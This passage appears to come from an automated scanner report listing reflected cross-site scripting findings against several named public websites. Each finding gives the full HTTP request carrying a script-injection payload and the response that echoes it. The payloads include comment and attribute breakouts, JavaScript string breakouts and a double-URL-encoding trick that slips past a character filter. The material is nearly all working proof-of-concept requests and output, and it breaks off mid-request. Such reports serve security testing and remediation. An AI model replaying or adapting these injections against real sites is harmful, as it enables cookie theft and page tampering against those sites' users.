Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/009629399ad8d0--><script>alert(1)</script>52643a8c339/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:10 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs/009629399ad8d0--><script>alert(1)</script>52643a8c339/apdxa.htm -->
...[SNIP]...

4.1356. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2555c<script>alert(1)</script>531e0e4cf4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399/apdxa.htm2555c<script>alert(1)</script>531e0e4cf4d HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm2555c<script>alert(1)</script>531e0e4cf4d<br>
...[SNIP]...

4.1357. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload fd4ac--><script>alert(1)</script>2923402d058 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/009629399/apdxa.htmfd4ac--><script>alert(1)</script>2923402d058 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs/009629399/apdxa.htmfd4ac--><script>alert(1)</script>2923402d058 -->
...[SNIP]...

4.1358. http://www.paperg.com/jsfb/embed.php [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cca3d%3balert(1)//9aef970de53 was submitted in the bid parameter. This input was echoed as cca3d;alert(1)//9aef970de53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=2123cca3d%3balert(1)//9aef970de53 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:30:44 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=vufrp7pm92h5eh5n690v6buc47; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39354


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123cca3d;alert(1)//9aef970de53 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123cca3d%3balert(1)//9aef970de53';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');
...[SNIP]...

4.1359. http://www.paperg.com/jsfb/embed.php [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da04'-alert(1)-'3a2639eb879 was submitted in the bid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=21235da04'-alert(1)-'3a2639eb879 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:30:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=bj9osp79pdc6rvuque87t7gaf5; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37179


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL21235da04'-alert(1)-'3a2639eb879 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=21235da04'-alert(1)-'3a2639eb879';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

4.1360. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c3d'-alert(1)-'805b94c064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=2123&e6c3d'-alert(1)-'805b94c064=1 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:31:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=tgpuk9fpo1c961qma9rrunbtf7; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39301


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123&e6c3d'-alert(1)-'805b94c064=1';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...

4.1361. http://www.paperg.com/jsfb/embed.php [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db653'-alert(1)-'db295b4a728 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922db653'-alert(1)-'db295b4a728&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:30:24 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=e7mng6c564g6j5k6u2er2d2c96; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39299


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922db653'-alert(1)-'db295b4a728&bid=2123';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length
...[SNIP]...

4.1362. http://www.parenthood.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parenthood.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1907'-alert(1)-'807a8eb3eff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d1907'-alert(1)-'807a8eb3eff=1 HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=bbrk35ahflo8ifh800tav2f6k6; path=/
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 106944


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta htt
...[SNIP]...
<script type="text/javascript">


OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.parenthood.com/index.php?d1907'-alert(1)-'807a8eb3eff=1';
OAS_listpos = 'Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight';
OAS_target = '_blank';

OAS_rn = new String(Math.random());
OAS_rn
...[SNIP]...

4.1363. http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /article_submission.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdb2"><script>alert(1)</script>eff65952e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article_submission.php/8fdb2"><script>alert(1)</script>eff65952e99 HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Apache
Vary: User-Agent
Content-Length: 4014
Connection: close
Content-Type: text/html

<html>
<head>
<title>Article Submission</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/SA_CSS.css" rel="stylesheet" type="text/css">
<link href="/css
...[SNIP]...
<form name="Mail" enctype="multipart/form-data" method="post" action="/article_submission.php/8fdb2"><script>alert(1)</script>eff65952e99">
...[SNIP]...

4.1364. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 10ba7<script>alert(1)</script>027582b0bfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts10ba7<script>alert(1)</script>027582b0bfb/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:22 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922622"
Last-Modified: Tue, 25 Jan 2011 02:30:22 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107109 (MII-APC/1.6)
Connection: close
Content-Length: 27346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts10ba7<script>alert(1)</script>027582b0bfb/articles/blood-sugar.html </div>
...[SNIP]...

4.1365. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e81cc<script>alert(1)</script>2f2a9ded22f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articlese81cc<script>alert(1)</script>2f2a9ded22f/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:47 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922647"
Last-Modified: Tue, 25 Jan 2011 02:30:47 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 27346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articlese81cc<script>alert(1)</script>2f2a9ded22f/blood-sugar.html </div>
...[SNIP]...

4.1366. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6ed33<script>alert(1)</script>6dc486f4e04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles/blood_sugar.html6ed33<script>alert(1)</script>6dc486f4e04 HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:31:19 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922679"
Last-Modified: Tue, 25 Jan 2011 02:31:19 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 27346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles/blood-sugar.html6ed33<script>alert(1)</script>6dc486f4e04 </div>
...[SNIP]...

4.1367. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b6e7<script>alert(1)</script>7501bcb859 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts6b6e7<script>alert(1)</script>7501bcb859/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:14 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922614"
Last-Modified: Tue, 25 Jan 2011 02:30:14 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close
Content-Length: 27354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts6b6e7<script>alert(1)</script>7501bcb859/articles/workout-schedule.html </div>
...[SNIP]...

4.1368. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42a76<script>alert(1)</script>719a71fabf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles42a76<script>alert(1)</script>719a71fabf5/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:47 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922647"
Last-Modified: Tue, 25 Jan 2011 02:30:47 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107114 (MII-APC/1.6)
Connection: close
Content-Length: 27356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles42a76<script>alert(1)</script>719a71fabf5/workout-schedule.html </div>
...[SNIP]...

4.1369. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f9e83<script>alert(1)</script>d9fcde00515 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles/workout_schedule.htmlf9e83<script>alert(1)</script>d9fcde00515 HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:31:24 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922684"
Last-Modified: Tue, 25 Jan 2011 02:31:24 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 27356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles/workout-schedule.htmlf9e83<script>alert(1)</script>d9fcde00515 </div>
...[SNIP]...

4.1370. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 755fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb97b88a4df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 755fe"><script>alert(1)</script>b97b88a4df6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about-us?755fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb97b88a4df6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/about-us?755fe"><script>alert(1)</script>b97b88a4df6=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1371. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3409%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e24591c134 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3409"><script>alert(1)</script>2e24591c134 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /advertise?a3409%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e24591c134=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
